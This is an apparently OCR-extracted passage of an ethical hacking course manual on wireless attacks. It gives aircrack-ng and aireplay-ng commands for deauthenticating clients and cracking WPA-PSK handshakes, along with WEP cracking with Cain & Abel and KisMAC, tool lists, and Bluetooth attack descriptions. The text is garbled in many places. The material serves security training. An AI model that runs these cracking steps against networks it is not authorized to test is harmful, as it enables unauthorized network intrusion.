W EP

HOME

1E:64:51:3B:FF:3E

76

70

157

1

0

11

54e

W EP

W EP

SECRET SSID

BSSID

Station

PW R

Rate

Lost

1E:64:51:3B:FF:3E

00:17:9A:C3:CF:C2

-1

1-0

0

Packets 1

1E:64:51:3B:FF:3E

00:1F:5B:BA:A7:CD

76

le 54

0

6

CIPHER

AUTH

ESSID IAMROGER

PSK

COMPANYZONE I

Probes

FIGURE 15.64: Collecting wireless traffic data using airodump-ng

Module 15 Page 2312




How to Crack WPA-PSK Using Aircrack (Cont‫)!־׳‬

CEH

Step 3 : De-authenticate (deauth) the client using Aireplay-ng. The client will try to authenticate with AP which will lead to airodump capturing an authentication packet (WPA handshake)

□

Command Prompt C: \>aireplay-ng -deauth 11 -a02:24:2B:CD:68:EE

Step 4 : Run the capture file through aircrack-ng m

H

Command Prompt

c:\>aircrack-ng.exe-a2 ■w capture.cap Opening capture.cap Read 607 packets • BSSIS ESSID Encryption 102:24:2B:CD:68:EE COMPANYZONE Choosing first network as target. Opening ../capture.cap Peading packets, please wait...

WPA <1 handshako

Aircrack-ng 0.7 rl30 [00:00:03) 230 keys tested (73.41 k/s) KEY FOUNDI[ key] Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6 39 E4 30 B3 2F 31AA 37 AC 82 5A 55 B5 55 24 EE Transdent Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 DO 89 83 D2 49 73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD EAPOL HMAC : 52 27 B8 3F 73 7C 45 AO 05 97 69 5C 30 78 60 BD

Copyright © by EG-CtUIICil. All Rights R eserved. Reproduction is Strictly Prohibited.

How to Crack WPA-PSK Using A ircrack (Cont’d) Step 3: Deauthenticate (deauth) the client using Aireplay-ng. The client will try to authenticate with AP, which will lead to airodump capturing an authentication packet (WPA handshake).

FIGURE 15.65: Deauthenticating (deauth) the client using Aireplay-ng

Step 4: Run the capture file through aircrack-ng.

Module 15 Page 2313




□1

Command Prompt c : \>aircrack-ng.exe-a 2 -w capture.cap Opening capture.cap Read 607 packets # BSSIS

ESSID

1 0 2 :2 4 : 2 B : C D : 6 8 :E E

Encryption

C0M PA N Y20N E

W P A <1 h a n d s h a k e s

C h o o s in g f ir s t n e t w o r k a s t a r g e t . O p e n in g ../ c a p tu r e .c a p P e a d in g p a c k e ts , p le a s e w a it ...

Aircrack-ngO.7 rl30 [00:00:03] 230 keys tested (73.41k/s) KEY FOUND! [key] M aster Key

: CD D7 9A 5A CF BO 70 C7 E9 D1 02 3B 87 02 85 D6 39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE

Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 DO 89 83 D2 49 73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 D9 6F 76 5B 8C D3 DF 13 2F BC D A6A 6E D9 62 CD EAPOL HMAC : 52 27 B8 3F 73 7C 45 AO 05 97 69 5C 30 78 60 BD

FIGURE 15.66: Running the capture file through aircrack-ng

Module 15 Page 2314




WPA Cracking Tool: KisMAC , KisM AC 0.3.3

1

Delete

x< a 1

‫ן‬

Test Injection

XT

1

Jo in Network

‫ז‬

XX J

1

Show Details

NetgearInc. 20X2-07-10114228‫( י‬ 2012-07-1021:36:33h1 Channel MamChannel edRates 1.2. 5.5. 11.18.24.36.5s S*gnal Ma*Signal AvgSignal Type 1 Encryption Rackets 441061 DataPackets 375S03 ManagementPack•6555• ControlPackets 0 UniqueIVs 253791 Inj.Packets 100 •ytes 5673M.S Key ASCII Key lastiv 000000

Monitor Signal Strength

A XM

Monitor all signals Deauthenticate

OS8D

Deauthenticate all Networks Authentication Flood Reinject Packets unknown

NoElevationData

5«gnal sentBytes re
KzzxLzzmm

►

Crack

CEH

Weak Scheduling Attack •

against LEAP Key ►

Bruteforce

!unknown

0 0 unknown 0 0 unknown 0 0 unknown 0 0 unknown 0 0 unknown__________ 0_________ 0

against W PA Key against 40-bit Apple Key against 104-bit Apple Key against 104-bit MD5 Key

«l You can crack/brute force WEP and WPA s using KisMAC «l KisMAC runs on MAC OS X 2668unknown ?788unknown

Ji

Start Scan

*

h ttp://trac. kismac-ng. org Copyright © b y iC - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

WPA C racking Tool: K isM AC Source: http://trac.kismac-ng.orR KisMAC is a sniffer/scanner application for Mac OS X. It uses monitor mode and ive scanning. It s many third-party USB devices such as Intersil Prism2, Ralin rt2570, rt73, and Realtek rtl8187 chipsets. All of the internal AirPort hardware is ed for scanning. A few KisMAC features include: 9

Reveals hidden / cloaked / closed SSIDs

9

Shows logged in clients (with MAC addresses, IP addresses, and signal strengths)

Q

Mapping and GPS

Q

Can draw area maps of network coverage

9

PCAP import and export

Q for 802.llb /g 9

Different attacks against encrypted networks

9

Deauthentication attacks

9

AppleScript-able

9

Kismet drone (capture from a Kismet drone)

Module 15 Page 2315



* n Property


f

D«lete

X® 1 1

|

Test Injection

XT

1 Network

SSID BSSJD SetgearInc. firstSwr 2012-07-10114228‫( י‬ , LastSeen Channel MamChannel , edRates S«onal MaxS
WEP

441061 Packets 37S503 DataPackets ManagementPack! 6S5S8 Control Packets 0 253791 Umqueivs 100 Inj. Packets Bytes 5673Mi8 Key ASCII Key 000000 LastfV

XX)

Show Details Monitor Signal Strength Monitor all signals

~XM

0XD Deauthenticate Deauthenticate all Networks Authentication Flood Reinject Packets

1

Vendor Signal sentBytes recv. Bytes IPAddress 2286 unknown unknown 08 0 unknown OB 2286 unknown 0 unknown 1908unknown 0 06 unknown 2288 unknown 0 08 2668 unknown unknown OB 0 unknown 1908 unknown 0 06 unknown 2666 unknown 0 08 unknown 2668 unknown 0 06 unknown 2668 unknown 0 08 unknown 2668 unknown 0 08 unknown 1526unknown 0 08 unknown 06 1908 unknown 0 Weak Scheduling Attack Bruteforce

against 40-bit Apple Key against 104-bit Apple Key against 104-bit MD5 Key

2668 unknown 2668 unknown 6248 unknown 2288 unknown 1528 unknown 2668 unknown 1908 unknown 2288 unknown 2668 unknown 2668 unknown 2668unknown 2668 unknown 2668 unknown ..?7JBB. unknown

NoElevationData

Start Scan

9

FIGURE 15.67: KisMAC screenshot

Module 15 Page 2316




WEP C racking Using Cain & Abel

CEH Urt«fW<

W EPK/s

Fudge Factor

|2

1702528

- Last KB Brute-Focce---z i

r r

| last key byte

ate bci

W A_u15

W A_u13_2

F

A_s5_2

W A_u5_2

W A_s3

P

W A_s13

W A_u13_3

W A_s5_3

W A_u5_3

W A_4_:13

F

W A_s5_1

W A_u5_1

W A_u5_4

W A_4_u5_1

K3

0 1 2 1 3

s s 7 3 9 13

11

D e p th / / / / / / / / / / / /

UEP Key

0 0 0 0 0 0 0 0 0 0 0 0

W E P Cracker utility in Cain implem ents statistical cracking and P T W cracking m ethods for the

Korek's Attacks‫־‬

A_u13_1

ItlMul NMkM

B y te C( F( S3( 61( C( E( 65( 74( bB( 65( 79( 30(

6 6

1 1 1 1 1 1 1 1 1 1 1 1

fo u n d

6 6

(v o te ) 2 7 7 )4 7 ( 2 8 0 )8B( 2 4 9 )5 8 ( 2 3 5 )4 7 ( 196 ) B E ‫(׳‬ 3 1 4 )3 E( 18b) 8 E( 272 )5B( 1 1 0 )1 8 ( 6 8 4 )6 4 ( 2 8 0 )2 D ( 326 )7B(

1 3 )2 1 ( 2 7 )1 3 ( 1 5 )8 6 ( 2 8 )B 8 ( 2 4 )9 9 ( 4 5 )4 1 ( 2 7 )C 9 ( 3 9 )3 1 ( 2 6 )B 2 ( 2 4 )D4( 3 0 )0 1 ( 8 1 ) O E(

1 2 )9 7 ( 2 4 )C C ( 1 5 )2 8 2 8 )3 6 ( 1 5 )6 8 2 8 )D 2 ( 2 5 ) 5A ( 8 )C C ( 1 5 )0 6 ( 1 5 )E B ( 3 0 )3 1 ( 4 1 )1 C (

2

1 2 )0 5 ( 1 5 )9 C ( 1 5 )9 F ( 2 4 )0 1 ( 1 3 ) 8D( 2 4 )1 8 ( 1 5 )7 D ( 25)0 B ( 1 5 )6 1 ( 1 5 )1 2 ( 2 8 )7 7 ( 3 9 )A 5 (

recovery of a W E P Key

0 )F 0 ( 1 2 )9 D ( 1 2 )3 9 ( 1 5 )D O ( 1 3 )5 7 ( 1 5 )4 0 ( 1 3 )E 3 ( 1 5 )E C ( 1 S )4 D ( 1 5 )F 6 ( 2 4 )F 0 ( 2 8 )1 9 (

1

A S C I I : l o c o I n c > tkoy0 3 H sx 6 C 6 F6 3 6 1 6 C 6 E 6 5 7 4 6 B 6 5 7 9 3 0 3 0

http://www.oxid.it

Copyright © b y IG -C O H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

I ^ j WEP C racking Using Cain & Abel 1

*

Source: http://www.oxid.it

Cain & Abel is a recovery tool for Microsoft operating systems. The WEP Cracker utility in Cain implements statistical cracking and the PTW cracking method for the recovery of a W EP key. This tool even allows easy recovery of various kinds of s by sniffing the network, cracking encrypted s using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled s, recovering wireless network keys, revealing boxes, uncovering cached s, and analyzing routing protocols. The latest version includes a new feature, APR (ARP Poison Routing), which enables sniffing on switched LANs and man-in-the-middle attacks. The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms.

Module 15 Page 2317




*I

Korek's W EP A ttack K ey s tested 50 \WI/C IV/‫״‬. L Pr IVs

W E P K e y Length

Initial part 01 the k ey (Hex)

1128 bits

1

2 ]

1 I'D L W INO O IW C T U ILC

Fu d ge Factor 1702528

[2

‫־‬

| last k ey byte

d

I-

alfa-numeric keys only

I-

B C D hex digits only

Korek's A tta ck s 17 A _u 1 5

17 A _u 1 3 _2

(7 A _s5_2

|7 A _u 5 _2

[7 A _s3

17 A _ 4 _ u 5 _ 2

17 A _s 1 3

( 7 A _u 1 3 _3

17 A _ s 5 _ 3

17 A _ u 5 _ 3

17 A _4 _s 1 3

17 A _ n e g

17 A u13 1

[ 7 A_s5 _1

F

F

I?

KB 0 1 2 3 4 5 6 7 8 9 10 11

Depth 0/ 0/ 0/

0/ 0 0 0 0 0 0 0 0

WEP K e y

Byte 6C( 6F ( 63( 61( 6C( 6E( 65( 74( 6B( 65( 79( 30(

1 1 1 1 1 1 1 1 1 1 1 1

/ / / / / / / /

found

A u5 1

(vote) 277)47( 2 8 0 ) 8B( 249)58( 235)47( 196)B5( 3 1 4 ) 3E( 1 8 6 ) 8E( 2 7 2 ) 5B( 110)18( 684)64( 280)2D( 3 2 6 ) 7B(

13)21( 27)13( 15)86( 28)B8( 24)99( 45)41( 27)C9( 39)31( 26)B2( 2 4 )D4( 30)01( 8 1 ) 0E(

A u5 4

12)97( 2 4 )CC( 15)28( 28)36( 15)68( 28)D2( 2 5 ) 5A( 2 8 )CC( 15)06( 1 5 )EB( 30)31( 41)1C(

A 4 u5 1

12)05( 1 5 ) 9C( 1 5 ) 9F( 24)01( 1 3 ) 8D( 24)18( 1 5 ) 7D( 2 5 ) 0B( 15)61( 15)12( 28)77( 39)A5(

0 )F0 ( 1 2 )9D( 12)39( 1 5 )DO( 13)57( 15)40( 13)E3( 1 5 )EC( 1 5 ) 4D( 15)F6( 24)F0( 28)19(

0) 8) 0) 15) 12) 15) 13) 13) 13) 15) 15) 24)

1 o c a 1 n e t k e y 0

!

ASCII: l o c a l n e t k e y 00 Hex: 6C6F63616C6E65746B65793030

Start

Exit

FIGURE 15.68: Screenshot showing WEP Cracking Using Cain & Abel

x]

P TW WEP A ttack C r a c k in g WEP

K ey

A S C I I : H e *:

128

b i t

fo u n d

k e y

( d o n e )

!

lo c a ln e tk e y O O

6 C 6 F 6 3 6 1 6 C 6 E 6 5 7 4 6 B 6 5 7 9 3 0 3 0

A t t a c k

s to p p e d .

Start

Cancel

FIGURE 15.69: Recovering WEP key using PTW cracking method

Module 15 Page 2318




I

WPA Brute Forcing Using Cain & Abel \

Source: http://www.oxid.it

Cain can recover s by sniffing the wireless network and crack WPA-PSK encrypted s using dictionary and brute-force attacks. Its new version also ships routing protocols, authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, /hash calculators, cryptanalysis attacks, decoders, and some not so common utilities related to network and system security.

Module 15 Page 2319




WPA Cracking Tool: Elcomsoft W ireless Security Auditor W* k W "

J

Elcom soft W ireless Security

£ Inptit Si•-•

Auditor allows netw ork s to audit accessible w ireless netw orks J

O ftiW

Hflp

S Cette pc jW

‫״‬

irtonjnes loal: r r t t o p ‫^׳‬ Cvcn: speed p sw rt

CEH

A Cf«n prqec!

£ j

*

project

H i Start attack

1 Or Od 0tc0-rcA6\ ITS 72*) aagiectopu

Pause atiack

& Check lot updates

OKtonann left: Tne left: Average %>ee3: Proccjsorload: en#6t1<x 3%‫־‬

9 Help corterts

a Oy Od O h Jlm Jls 123 706 S7*to

It com es w ith a built-in w ireless ne tw o rk sniffer (with AirPcap adapters)

J

It tests the strength of Chann*

W PA /W P A 2 - PSK s

6 10 11 11 11 6 1 ‫נ‬

protecting your wireless network

BSE t f V f l P ■ ■ m m m tm m m m warn m m ■ ■ mm mm m u mm

M M |n ■ 1 ■ E H ■■■ ■ ■ 1

Beacons

Data

Ptxm

S«**d

Snaypton

352 37 254 257 129 0

1116 56 0 0 0 ‫נ‬ 0 0

•56 •76 -63 -66 •75 -70 •78 •76

54 46 54 54 54 •1 46 46

WPA WPA OPEN WEP or Vfi>A VJ£P v WPA WEP or WPA WEP Of WPA

2 2

m m m m m

http://www.elcom soft.com Copyright © b y iC - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

, WPA C racking Tool: Elcomsoft W ireless Security Auditor Source: http://www.elcomsoft.com Elcomsoft Wireless Security Auditor allows you to the security of a company's wireless network by executing an audit of accessible wireless networks. It comes with a built-in wireless network sniffer (with AirPcap adapters). It attempts to recover the original WPA/WPA2-PSK text s in order to test how secure your wireless environment is. Elcomsoft Wireless Security Audito^B FJe

Action

£ Import data

I

Options

»

OcDorvanes total: Timeelapsed: CuTent speed: last:

Module 15 Page 2320

Help

a Create project

en project

Oy Od

•

0 M > m :4 6 t

17S 779 o n g ic r io p u

ti

ti

Save project

Start attack

/£ Pause attack

Octonanesleft: Tme left: Average speed: Processortoad:

9 Check for updates

O yO d

o Help contents

O h Jl m ; ) U

123 708

57H ,

er>S*sK<Jc - 3 %




W ireless listener is in progress

_____

Access Points

Use Selected

C w cd

1

FIGURE 15.70: Elcomsoft Wireless Security Auditor screenshot

Module 15 Page 2321




WEP/WPA Cracking Tools o

WepAttack

(f)

http://wepattack.sourceforge.net

Wesside-ng

1

http://wepcrack.sourceforge.net

Portable Penetrator

http://www.seoint.com

https://www.cloudcracker.com

Aircrack-ng


tt*H4i Nath*

CloudCracker


‫מ‬

c EH

C.il.fwd

coWPAtty

http://wirelessdefence.org

WEPCrack

Wifite

http://code,google,com

WepDecrypt

WepOff

http://wepdecrypt.sourceforge.net

http://www.ptsecurity.ru


W EP/W PA Cracking Tools WEP/WPA cracking tools are used for breaking 802.11 WEP secret keys. These tools recover a 40-bit, 104-bit, 256-bit, or 512-bit W EP key once enough data packets have been captured. A few tools guess WEP keys based on an active dictionary attack, key generator, distributed network attack, etc. The following are a few WEP/WPA Cracking tools used by attackers: 9

WepAttack available at http://wepattack.sourceforge.net

9

Wesside-ng available at http://www.aircrack-ng.org

9

Aircrack-ng available at http://www.aircrack-ng.org

9

WEPCrack available at http://wepcrack.sourceforge.net

9

WepDecrypt available at http://wepdecrvpt.sourceforge.net

9

Portable Penetrator available at http://www.seoint.com

9

CloudCracker available at https://www.cloudcracker.com

9

coWPAtty available at http://wirelessdefence.org

9

Wifite available at http://code.google.com

9

WepOff available at http://www.ptsecuritv.ru

Module 15 Page 2322




Module Flow

JT

C EH

M odule Flow

So far, we have discussed various wireless concepts, wireless encryption, threats, and hacking methodology. Now we will discuss wireless hacking tools. Wireless hacking can also be performed with the help of tools. The wireless hacking tools make the attacker's job easy. This section covers various Wi-Fi sniffers, wardriving tools, RF monitoring tools, Wi-Fi traffic analyzers, etc.

Wireless Concepts

^

m

t
Wireless Encryption

Wireless Threats

| ‫ ||||ן‬Wireless Hacking Methodology

Wireless Hacking Tools

^

Bluetooth Hacking

^— —

Wireless Security Tools

Countermeasure

0‫כ‬

V‫׳‬

Wi-Fi Pen Testing

Module 15 Page 2323




Wi-Fi Sniffer: K ism et J

K ism t S ort Vi«w Windows Nm • BSSID TC TRBCnet 00:14:01:5 f :97:12 A 0 linksys_SES_45997 0 0 :16:86:18:E4:FF A 0

It is an 802.11 Layer2 w ireless ne tw o rk detector, sniffer, and

la n d sc a p e s linfcsys

intrusion d etection system J

ively collecting packets and detecting standard nam ed

P ickles

netw orks J

AN AN AW AM P N AN A0 AN A0 A cf A Wj A0

6 2437 6 2437 11 2462 ‫ •־‬2412 ............. 11 2462 11 2462 6 2442 6 2442

itfciul Nm Im

2 Bcnft S i• C lnt Manuf Ctv SMn 1 Tr*nd*ar«I — wlanO .............

Pkts Si • 1 08 2 08 08 08 4 S 08 08 9 08 10 08 13 08 17 OB 19 OB 23 OB

............. ............. ............. ............. ............. ............. ............. ............. ............. ............. .............

I I

Autogroup Probe TFS ■eskas Xu Chen TK421 Eline-PC-W ireless

It identifies n etw orks by

00:14 BF:07:2f •4 0 0 :1A:70:0 9 :K : 13 00 1F.90:E6 EO 84 00 1F 90FA.F4 Cl 00:13 E8:9 2 :3FC8 00:09 56:07 :90 82 00 18:01:F5 65E1 00:18:01:F9:70:F0 00:18:01:F E 6 8 7 7 00:24 B 2 0 E E 6 E 2 00 IF 90 E4 04 F1 00:1F:33:F3:C5:4A

1 2417 6 2447

CEH

(•rtifwtf

1 Cisco-Link - - - wlanO 1 1 1 1 1 1 1 1 1

1

C sco-Link Cisco-Link A ctlortecE ActiontacE IntolCorpo N«tg«ar ActiontocE ActiontccE ActiontocE

••• ■lanO — wlanO --■lanO ••• wlanO ■lanO US «lanO US *lanO ■lanO wlanO ■lanO

It detects hidden n etw orks and presence of nonbeaconing n etw orks via data traffic

NoGPSinfo (GPSnot connoctod)

*

‫י‬

No ip d a t• f r o • GPSO in 15 seconds or ■or•, a ttM p tin g to rocormoct No ip d a t• fro■ GPSD in 1S soconds or ■ore. a ttM p tin g to roconnoct

: Could not comoc t t o th • spoctools s«rv«r lo c a lh o s t:30569 : No updat• fro■ GPSO in 15 soconds or ■oro. a ttM p tin g to roconnoct No updat• fro■ GPSO in 15 soconds or ■or•. a ttM p tin g to roconnoct

http://www.kismetwireless.net

Copyright @ b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-Fi Sniffer: Kism et Source: http://www.kismetwireless.net Kismet is an 802.11 Iayer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card that s raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, 802.lln , and 802.l l g traffic (devices and drivers permitting). It identifies networks by ively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and inferring the presence of nonbeaconing networks via data traffic.

Module 15 Page 2324




K is M t S o rt View Windows TRENDnet lin k jy s SES 45997 OQf 93 landscape‫! ׳‬ lin k sy s MPA41 6S I 03 Autogroup Probe TFS meskas Xu Chen 1X 421 Elina-PC -W ireless 7 J4 R 0

P ic k le s

00: 14: 01: 5F : 97:12 A 0 12417 00: 16: 86: 1B :E 4:FF A 0 6 2447 00: I F :90 F2 CD:C2 A W 12412 00: 14:B F : 07: 2F : 84 A N 6 2437 00: 1A : 70: 09:BC :13 A N 6 2437 00: 1F : 90:E 6:E 0:84 A W 112462 00 IF 90 FA.F 4 C8 A M --- 2412 00: 13: E8: 92: 3F:C 8 P N .............. 00: 09:58 07: 90:82 A N 11 2462 00: 18: 01:F 5: 65:E 1 A 0 11 2462 00: 18: 01:F 9: 70:FO A N 62442 00: 18:01: F E : 68:77 A 0 6 2442 00: 24: B2: OE: E6: E2 A 0* o n fi£ j r e 00: IF 90 E6. 04F 1 A W Naae 00: 1F : 33: F3:C5: 4A A 0 2 E Z 00: 16CE 07: 60:77 A W 3S 59 3

A

1 2

06 OB Ot

4 5

08 OB

S $

08

10 13 17 19 23

06 06 06 06 08

- -••• — —

... ...

... ... —

OB

-‫־‬--* — — —

... ...

... ... ...

1 Trendwarel 1 Cisco-Link

— --A ctio n tecE US 1 Cisco-Link — 1 Cisco-Lin k — 1 A ctio n tecE 1 A ctio n tecE — 1 IntelC orp o •*• ... 1 Netgear 1 A ctio n tecE US 1 A ctio n tecE US 1 A ctio n tecE —

Charnel Chan K

■

A

[ WEP Uanuf I C ) Lock Channels E

( Cancel ]

[ Change ]

No GPS in fo (GPS not connected) E 25: N0uPdate [ g g E : No update r g g S : Could not No update [ S 2S i : N0update

f ron GPSD fron GPSD connect to fro■ GPSD fro■ GPSD

in 15 seconds or •ore, attem pting to reconnect in 15 seconds or •ore, attem pting to reconnect the spectools server lo c a lh o s t :30569 in 15 seconds or •ore, attem pting to reconnect in 15 seconds or ■ore, a tte a p tin g to reconnect

FIGURE 15.71: Kismet screenshot

Module 15 Page 2325




airbase-ng

MacStumbler

http://aircrack-ng.org

http://www.macstumbler.com

ApSniff

WiFi-Where

http://www.mon0lith8 1 .de

http://www.threejacks,com

WiFiFoFum

AirFart

http://www.aspecto-software.com

«?

*

http://airfart.sourceforge.net

MiniStumbler

AirTraf

WarLinux

802.11 Network Discovery Tools

http://www.netstumbler.com

http://airtraf.sourceforge.net

http://sourceforge.net

http://wavelan-tools.sourceforge.net


k- W ardriving Tools Wardriving tools enable s to list all access points broadcasting beacon signals at their location. It helps s to set new access points, making sure there are no interfering APs. These tools even the network setup, find the locations with poor coverage in the WLAN, and detect other networks that may be causing interference. They detect unauthorized "rogue" access points in your workplace: 9 airbase-ng available at http://aircrack-ng.org 9 ApSniff available at http://www.monolith81.de 9 WiFiFoFum available at http://www.aspecto-software.com 9 MiniStumbler available at http://www.netstumbler.com 9 WarLinux available at http://sourceforge.net 9 MacStumbler available at http://www.macstumbler.com 9 WiFi-Where available at http://www.threejacks.com 9 AirFart available at http://airtraf.sourceforge.net 9 AirTraf available at http://airtraf.sourceforge.net 9 802.11 Network Discovery Tools available at http://wavelan-tools.sourceforge.net

Module 15 Page 2326




RF M onitoring Tools NetworkManager

WaveNode

http://www.wavenode.com

http://projects.gnome,org

KWiFiManager

xosview

http://kwifimanager.sourceforge.net

http://xosview.sourceforge.net

RF Monitor

NetworkControl

http://www.arachnoid.com

http://www.newsteo.com

^

KOrinoco

DTC-340 RFXpert

http://korinoco.sourceforge.net

Sentry Edge II

http://www.tek.com

CEH

http://www.dektec.com

I PI ■‫־*־־‬

‫־־‬

Home Curfew RF Monitoring System

http://solutions.3m.com


L

J

RF M onitoring Tools

Radio frequency (RF) monitoring tools help in discovering and monitoring Wi-Fi networks. These tools help you to control and monitor network interfaces, including wireless ones. They allow you to see network activity and help you to control network interfaces in a convenient way. A list of RF monitoring tools follows: ‫י ד‬

‫־די‬

e

NetworkManager available at http://proiects.enome.org

9

KWiFiManager available at http://kwifimanager.sourceforge.net

9

NetworkControl available at http://www.arachnoid.com

e

KOrinoco available at http://korinoco.sourceforge.net/

9

Sentry Edge II available at http://www.tek.com

Q WaveNode available at http://www.wavenode.com 9

xosview available at http://xosview.sourceforge.net

Q

RF Monitor available at http://www.newsteo.com

9

DTC-340 RFXpert available at http://www.dektec.com

9

Home Curfew RF Monitoring System available at http://solutions.3m.com

Module 15 Page 2327




Wi-Fi Traffic Analyzer Tools RFProtect Spectrum Analyzer

M

AirMagnet WiFi Analyzer

http://www.flukenetworks.com

^

Ufasoft Snif

p

http://www.arubanetworks.com

_

http://ufasoft.com

•

OptiView® XG Network Analysis Tablet

http://www.javvin.com

Observer

http://www.netinst.com

vxSniffer

http://www.cambridgevx.com

OneTouch™ AT Network Assistant


Network Traffic Monitor 81 Analyzer CAPSA

CEH

http://www.flukenetworks.com QHB □ □C

http://www.colasoft.com

: ifnnl =IBB]

SoftPerfect Network Protocol Analyzer

Capsa Network Analyzer


W i-F i Traffic Analyzer Tools Wi-Fi traffic analyzer tools analyze, debug, maintain, and monitor local networks and Internet connections for performance, bandwidth usage, and security issues. They capture data ing through your dial-up connection or network Ethernet card, analyze this data, and then represent it in an easily readable form. This type of tool is a useful tool for s who need a comprehensive picture of the traffic ing through their network connection or segment of a local area network. It analyzes the network traffic to trace specific transactions or find security breaches: 9

RFProtect Spectrum Analyzer available at http://www.arubanetworks.com

9

AirMagnet WiFi Analyzer available at http://www.flukenetworks.com

9

OptiView® XG Network Analysis Tablet available at http://www.flukenetworks.com

9

Network Traffic Monitor & Analyzer CAPSA available at http://www.iavvin.com

9

Observer available at http://www.netinst.com

9

Ufasoft Snif available at http://www.ufasoft.com

9

vxSniffer available at http://www.cambridgevx.com

9

OneTouch™ AT Network Assistant available at http://www.flukenetworks.com

9

Capsa Network Analyzer available at http://www.colasoft.com

Module 15 Page 2328



9


SoftPerfect Network Protocol Analyzer available at http://www.softperfect.com

Module 15 Page 2329




Wi-Fi Raw Packet Capturing and Spectrum Analyzing Tools Raw Packet C apturing Tools

lo

CEH

Spectrum A nalyzing Tools

WirelessNetView

Cisco Spectrum Expert

http://www.nirsoft.net

http://www.cisco,com

‫־‬5‫׳‬

Tdump J

AirMedic® USB

http://www.tdump.org


A

Airview

http://airview.sourceforge.net

■

RawCap

M f \ ■5■p i 15^

http://www.netresec.com

Airodump-ng

‫י‬

AirSleuth-Pro

.

BumbleBee-LX Handheld Spectrum Analyzer

'

(# )


http://nutsaboutnets.com

http://www.bvsystems.com

Wi-Spy

http://www.metageek.net


W i-Fi Raw Packet Capturing and Spectrum Analyzing Tools R a w P a c k e t C a p t u r in g T o o ls Raw packet capturing tools capture wireless network packets, and help you to visually monitor WLAN packet activities. These tools for Wi-Fi capture everypacket on the air and both Ethernet LAN and 802.11 and display network traffic at theMAClevel. A few of these types of tools are listed as follows: 9

WirelessNetView available at http://www.nirsoft.net

9

Tdump available at http://www.tdump.org

9

Airview available at http://airview.sourceforge.net

9

RawCap available at http://www.netresec.com

Q Airodump-ng available at http://www.aircrack-ng.org

S p e c t r u m A n a ly z in g T o o ls Spectrum analyzing tools are specially designed for RF Spectrum Analysis and Wi-Fi

Module 15 Page 2330

Ethical Hacking and Countermeasures Copyright © by EC-C0UllCil All Rights Reserved. Reproduction is Strictly Prohibited.



troubleshooting. With the help of these tools, s can detect any RF activity in the environment, including detecting areas where RF interference impacts performance — ultimately resulting in dissatisfaction due to slow connections or frequent disconnections. With this information, s can select the best channels for deploying Wi-Fi APs in the environment: 9

Cisco Spectrum Expert available at http://www.cisco.com

6

AirMedic® USB available at http://www.flukenetworks.com

Q AirSleuth-Pro available at http://nutsaboutnets.com Q

BumbleBee-LX Handheld Spectrum Analyzer available at http://www.bvsvstems.com

Q Wi-Spy available at http://www.metageek.net

Module 15 Page 2331




Module Flow

CEH

M o d u l e F lo w l!L— Bluetooth is a Wi-Fi service that allows sharing files. Bluetooth hacking allows an attacker to gain information of host from another Bluetooth-enabled device without the host's permission. With this type of hacking, the attacker can steal information, delete s from the victim mobiles, and extract personal files/pictures, etc. The different types of Bluetooth attacks and the tools that are used for performing such attacks are explained in following slides.

^

Wireless Concepts

^*

Wireless Threats

| j| | |

H

i

Module 15 Page 2332

Wireless Hacking Methodology

Bluetooth Hacking


Countermeasure

Wireless Encryption

s

v‫— ׳‬

Wireless Security Tools




Wi-Fi Pen Testing

Module 15 Page 2333




B lu e to o th H a c k in g J

Bluetooth hacking refers to exploitation of B lu eto o th stack im p lem entation vu lnerabilities to com prom ise sensitive data in Bluetooth-enabled devices and networks

J

Bluetooth enabled devices connect and com m unicate wirelessly through ad hoc networks known as Piconets

Bluesmacking DoS attack which overflows Bluetooth-enabled devices with random packets causing the device to crash

Blue Snarfing The theft of information from a wireless device through a Bluetooth connection

Bluejacking The art of sending unsolicited messages over Bluetooth to Bluetooth-enabled devices such as PDA and mobile phones

BlueSniff Proof of concept code for a Bluetooth wardriving utility

Copyright © by IG-C0HCil. All Rights Reserved. Reproduction is Strictly Prohibited.

B lu e to o th H a c k i n g Bluetooth is a short-range wireless communication technology intended to replace the cables connecting portable or fixed devices while maintaining high levels of security. It allows mobile phones, computers, and other devices to exchange information using a shortrange wireless connection. Two Bluetooth-enabled devices connect through the pairing technique. There are some Bluetooth security issues that are vulnerable and make hijacking on Bluetooth devices possible. Bluetooth hacking refers to the exploitation of Bluetooth stack implementation vulnerabilities to compromise sensitive data in Bluetooth-enabled devices and networks. The following are Bluetooth device attacks: B lu e j a c k in g

Bluejacking is the use of Bluetooth to send messages to s without the recipient's consent, similar to email spamming. Prior to any Bluetooth communication, the initiating device must provide a name that will be displayed on the recipient's screen. Because this name is defined, it can be set to be an annoying message or ment. Strictly speaking, Bluejacking does not cause any damage to the receiving device. It may, however, be irritating and disruptive to its victims. B lu e S n if f

BlueSniff is proof of concept code for a Bluetooth wardriving utility. It is useful for finding hidden and discoverable Bluetooth devices. It operates on Linux.

Module 15 Page 2334



O

B lu e s m


a c k in g

A Bluesmacking attack is when an attacker sends an oversized ping packet to a victim's device. This causes a buffer overflow in the victim's device. This type of attack is similar to an ICMP ping of death. B lu e s n a r f in g

